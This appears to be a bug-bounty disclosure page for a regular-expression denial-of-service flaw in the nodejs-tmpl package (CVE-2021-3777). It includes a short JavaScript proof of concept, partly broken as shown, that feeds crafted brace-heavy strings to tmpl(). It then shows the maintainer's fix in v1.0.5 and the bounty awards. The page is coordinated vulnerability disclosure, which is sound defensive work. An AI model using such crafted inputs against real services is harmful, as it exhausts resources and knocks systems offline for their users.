Inefficient Regular Expression Complexity in daaku/nodejs-tmpl


Reported on

Sep 4th 2021

✍️ Description

It allows cause a denial of service when formatting crafted string.

🕵️‍♂️ Proof of Concept

// PoC.js
var tmpl = require("tmpl")
for(var i = 1; i <= 50000; i++) {
       var time =;
       var attack_str = ""+"{".repeat(i*10000)+"answer";
        tmpl(attack_str, { answer: 42 })
       var time_cost = - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.


We created a GitHub Issue asking the maintainers to create a a year ago
Yeting Li submitted a
a year ago
a year ago


Hey Yeting, I've just contacted the maintainer about this report for you. Good job!

We have contacted a member of the daaku/nodejs-tmpl team and are waiting to hear back a year ago
a year ago


Seems reasonable. I pushed a fix in v1.0.5. Thanks for the report.

Yeting Li
a year ago


Thank you for your information @admin and thank you for your confirmation @daaku

Jamie Slome
a year ago


@daaku - are you able to mark as valid and confirm fix, so that the researcher gets rewarded for their efforts!

daaku validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
daaku confirmed that a fix has been merged on 4c654e a year ago
Yeting Li has been awarded the fix bounty
Jamie Slome
a year ago


CVE published! 🎉

Ref: CVE-2021-3777

Yeting Li
a year ago


Thanks a lot!😄

to join this conversation